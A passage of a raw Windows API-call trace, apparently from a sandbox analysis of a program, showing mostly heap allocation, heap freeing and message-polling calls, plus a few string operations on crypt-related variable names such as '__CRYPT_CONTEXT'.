(HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0209.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0209.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0209.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0209.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0209.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0209.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0209.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0209.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0209.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0209.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0209.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0209.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0209.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0209.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0209.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0209.505] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0209.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0209.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0209.505] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0209.505] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0209.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0209.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0209.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0209.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0209.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0209.506] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.506] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0209.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0209.506] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0209.506] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.506] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0209.507] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0209.507] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0209.507] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0209.507] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.507] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0209.507] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.507] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0209.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0209.508] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.508] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0209.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0209.508] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0209.508] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0209.508] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0209.508] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0209.508] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0209.509] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0209.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0209.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0209.509] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0209.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0209.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0209.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0209.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0209.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0209.509] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0209.509] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0209.510] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b60 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0209.510] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0209.510] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0209.510] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0209.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0209.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0209.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0209.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0209.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0209.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0209.511] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0209.511] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0209.511] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.511] 